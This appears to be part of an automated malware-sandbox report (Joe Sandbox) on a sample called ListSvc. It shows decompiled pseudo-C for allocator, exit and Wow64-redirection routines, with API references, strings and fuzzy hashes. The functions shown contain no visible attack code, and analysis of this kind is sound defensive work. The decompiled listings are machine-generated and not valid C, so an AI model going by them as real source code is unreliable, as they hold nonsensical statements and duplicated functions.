					E00422660(_v12,  &_v8);
					E004086E4( &_v8, L"shell32.dll");
					E00421230(_v8, _t27, 0x8000); // executed
					E004232EC(0x4c783afb,  &_v16);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(0x4b5b61);
				return E00407A80( &_v16, 3);
			}

0x004b5a90
0x004b5a93
0x004b5a95
0x004b5a97
0x004b5a9b
0x004b5a9c
0x004b5aa1
0x004b5aa4
0x004b5aa7
0x004b5aae
0x004b5ac9
0x004b5ae3
0x004b5aef
0x004b5afa
0x004b5afe
0x004b5afe
0x004b5afe
0x004b5b00
0x004b5b08
0x004b5b13
0x004b5b20
0x004b5b2d
0x004b5b3a
0x004b5b3a
0x004b5b41
0x004b5b44
0x004b5b47
0x004b5b59

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B

Strings

Wow64RevertWow64FsRedirection, xrefs: 004B5ACE
kernel32.dll, xrefs: 004B5AB9, 004B5AD3
Wow64DisableWow64FsRedirection, xrefs: 004B5AB4
shell32.dll, xrefs: 004B5B1B

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D

Uniqueness

Uniqueness Score: -1.00%

Function 00403EE8, Relevance: 9.0, APIs: 7, Instructions: 298
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00403EE8(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x4bb059; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00403C48();
								_t99 =  *0x4bdb80; // 0x4bdb7c
								 *_t147 = 0x4bdb7c;
								 *0x4bdb80 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x4bdb78 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
								_t133 =  *0x4bbaf0; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E00403BCC(_t125);
								} else {
									_t110 =  *0x4bbaec; // 0x21fa9d0
									_t109 = _t110 - _t125;
									 *0x4bbaec = _t109;
									 *0x4bbaf0 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x4bbae8 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x4bbb78 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x4bbaf8 + _t142 * 4;
								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x4bbaf4], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E00403B00(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x4bbae8 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x4bb059;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x4bbae8], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x4bbaf0; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E00403BCC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x4bbae8 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x4bbaec; // 0x21fa9d0
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
									 *0x4bbaec = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x4bbaf8 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x4bbaf8 + __eax * 4;
									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x4bbaf4], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E00403B00(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x4bbae8 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x21fa9f0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x00403ee8
0x00403ef4
0x00403efa
0x00404148
0x0040414d
0x00404260
0x00404261
0x00404263
0x00403c94
0x00403c98
0x00403c9a
0x00403ca4
0x00403cb4
0x00403cb9
0x00403cbd
0x00403cbf
0x00403cc1
0x00403cc7
0x00403cca
0x00403ccf
0x00403cd4
0x00403cda
0x00403ce0
0x00403ce3
0x00403ce5
0x00403cec
0x00403cec
0x00403cf5
0x00404269
0x00404269
0x0040426b
0x0040426b
0x00404153
0x00404153
0x0040415f
0x00404162
0x00404164
0x0040410c
0x00404111
0x00404119
0x00000000
0x00000000
0x0040411b
0x0040411d
0x00404124
0x00000000
0x00404126
0x00404128
0x00404132
0x0040413a
0x0040413e
0x00000000
0x0040413e
0x0040413a
0x00000000
0x00404124
0x0040410c
0x00404166
0x00404166
0x00404166
0x0040416e
0x00404171
0x0040417b
0x0040417b
0x00404182
0x00404195
0x00404199
0x0040419f
0x004041b8
0x004041be
0x004041be
0x004041c0
0x004041de
0x004041c2
0x004041c2
0x004041c7
0x004041c9
0x004041ce
0x004041d7
0x004041d7
0x004041e3
0x004041eb
0x004041a1
0x004041a1
0x004041ab
0x004041b3
0x00000000
0x004041b3
0x00404184
0x00404187
0x0040418a
0x004041ec
0x004041ec
0x004041ed
0x004041ee
0x004041f5
0x004041f8
0x004041fb
0x004041fe
0x00404200
0x00404202
0x00404209
0x0040420b
0x0040420b
0x0040420b
0x00404212
0x00404214
0x00404214
0x00404212
0x00404220
0x00404225
0x00404225
0x00404227
0x00404248
0x00404248
0x00404248
0x00404229
0x00404229
0x0040422f
0x00404232
0x00404236
0x0040423c
0x0040423e
0x0040423e
0x0040423c
0x0040424d
0x00404250
0x00404253
0x0040425f
0x0040425f
0x00404182
0x00403f00
0x00403f00
0x00403f02
0x00403f02
0x00403f09
0x00403f10
0x00403f68
0x00403f68
0x00403f6d
0x00403f71
0x00000000
0x00000000
0x00403f73
0x00403f73
0x00403f76
0x00403f7b
0x00403f7f
0x00403f81
0x00403f81
0x00403f84
0x00403f89
0x00403f8d
0x00403f8f
0x00403f92
0x00403f94
0x00403f9b
0x00000000
0x00403f9d
0x00403f9f
0x00403fa4
0x00403fa9
0x00403fad
0x00403fb5
0x00000000
0x00403fb5
0x00403fad
0x00403f9b
0x00403f8d
0x00000000
0x00403f7f
0x00403f68
0x00403f12
0x00403f12
0x00403f15
0x00403f18
0x00403f1d
0x00403f1f
0x00403f38
0x00403f3b
0x00403f3f
0x00403f41
0x00403f44
0x00403fbc
0x00403fbd
0x00403fbe
0x00403fc5
0x00403fc7
0x00403fc7
0x00403fcc
0x00403fd4
0x00000000
0x00000000
0x00403fd6
0x00403fd8
0x00403fdf
0x00000000
0x00403fe1
0x00403fe3
0x00403fe8
0x00403fed
0x00403ff5
0x00403ff9
0x00000000
0x00403ff9
0x00403ff5
0x00000000
0x00403fdf
0x00403fc7
0x00404000
0x00404004
0x00404004
0x0040400a
0x0040407c
0x00404080
0x00404086
0x00404088
0x004040b0
0x004040b4
0x004040b6
0x004040bb
0x004040bd
0x004040bf
0x00000000
0x004040c1
0x004040c1
0x004040c6
0x004040c8
0x004040c9
0x004040ca
0x004040cb
0x004040cb
0x0040408a
0x0040408a
0x00404090
0x00404094
0x0040409a
0x0040409c
0x0040409e
0x0040409e
0x004040a0
0x004040a2
0x004040a8
0x00000000
0x004040a8
0x0040400c
0x0040400c
0x0040400f
0x00404016
0x0040401d
0x00404020
0x00404023
0x0040402a
0x0040402d
0x00404030
0x00404033
0x00404035
0x00404037
0x00404039
0x0040403e
0x00404040
0x00404040
0x00404040
0x00404047
0x00404049
0x00404049
0x00404047
0x00404050
0x00404055
0x00404058
0x0040405e
0x004040cc
0x004040cc
0x004040cc
0x00404060
0x00404060
0x00404062
0x00404066
0x00404068
0x0040406b
0x0040406e
0x00404071
0x00404075
0x00404075
0x004040d1
0x004040d1
0x004040d1
0x004040d4
0x004040d7
0x004040d9
0x004040de
0x004040e0
0x004040e3
0x004040ea
0x004040ed
0x004040ed
0x004040f0
0x004040f4
0x004040f7
0x004040fa
0x004040fc
0x004040fc
0x004040fe
0x00404101
0x00404104
0x00404107
0x00404108
0x00404109
0x0040410a
0x0040410a
0x00403f46
0x00403f46
0x00403f46
0x00403f46
0x00403f4a
0x00403f4d
0x00403f50
0x00403f53
0x00403f54
0x00403f54
0x00403f21
0x00403f21
0x00403f25
0x00403f25
0x00403f28
0x00403f2b
0x00403f2e
0x00403f58
0x00403f5b
0x00403f5e
0x00403f61
0x00403f64
0x00403f65
0x00403f30
0x00403f30
0x00403f33
0x00403f34
0x00403f34
0x00403f2e
0x00403f1f

APIs

Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 00407750, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00407750() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t46);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L8:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L14:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t15 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t15);
								_t31 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L8;
					} else {
						_t20 = E004054B4();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00405CE8(_t44);
							_t23 = E004054B4();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t33();
					} while ( *0x4bb054 != 0);
					L8:
					while(1) {
					}
				}
			}

0x00407764
0x00407766
0x0040776b
0x00407772
0x00407772
0x0040777e
0x00407792
0x0040779c
0x0040779c
0x004077a5
0x004077c9
0x004077cd
0x004077d6
0x004077d6
0x004077dd
0x004077fc
0x004077fc
0x00407805
0x0040780c
0x00407811
0x00407813
0x00407818
0x0040781b
0x0040781b
0x0040781e
0x00407821
0x00407828
0x00407828
0x00407821
0x00407811
0x0040782f
0x00407838
0x0040783a
0x0040783a
0x00407841
0x00407845
0x00407845
0x0040784d
0x00407856
0x00407858
0x00407858
0x00407861
0x00407861
0x00407873
0x00407873
0x00407875
0x00407876
0x00000000
0x004077df
0x004077df
0x004077e4
0x004077e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004077ea
0x004077ea
0x004077ec
0x004077f1
0x004077f6
0x004077f8
0x00000000
0x004077ea
0x004077b0
0x004077b0
0x004077b0
0x004077b9
0x004077be
0x004077c0
0x00000000
0x004077c9
0x00000000
0x004077c9

APIs

GetCurrentThreadId.KERNEL32 ref: 00407780
FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861

Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718

Strings

MZP, xrefs: 00407827

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
API String ID: 3490077880-2889622443
Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F

Uniqueness

Uniqueness Score: -1.00%

Function 00407748, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00407748() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t50);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L9:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L15:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t18 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t18);
								_t34 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L9;
					} else {
						_t23 = E004054B4();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00405CE8(_t48);
							_t26 = E004054B4();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t36();
					} while ( *0x4bb054 != 0);
					L9:
					while(1) {
					}
				}
			}

0x0040774a
0x00407764
0x00407766
0x0040776b
0x00407772
0x00407772
0x0040777e
0x00407792
0x0040779c
0x0040779c
0x004077a5
0x004077c9
0x004077cd
0x004077d6
0x004077d6
0x004077dd
0x004077fc
0x004077fc
0x00407805
0x0040780c
0x00407811
0x00407813
0x00407818
0x0040781b
0x0040781b
0x0040781e
0x00407821
0x00407828
0x00407828
0x00407821
0x00407811
0x0040782f
0x00407838
0x0040783a
0x0040783a
0x00407841
0x00407845
0x00407845
0x0040784d
0x00407856
0x00407858
0x00407858
0x00407861
0x00407861
0x00407873
0x00407873
0x00407875
0x00407876
0x00000000
0x004077df
0x004077df
0x004077e4
0x004077e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004077ea
0x004077ea
0x004077ec
0x004077f1
0x004077f6
0x004077f8
0x00000000
0x004077ea
0x004077b0
0x004077b0
0x004077b0
0x004077b9
0x004077be
0x004077c0
0x00000000
0x004077c9
0x00000000
0x004077c9

APIs

GetCurrentThreadId.KERNEL32 ref: 00407780
FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861

Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
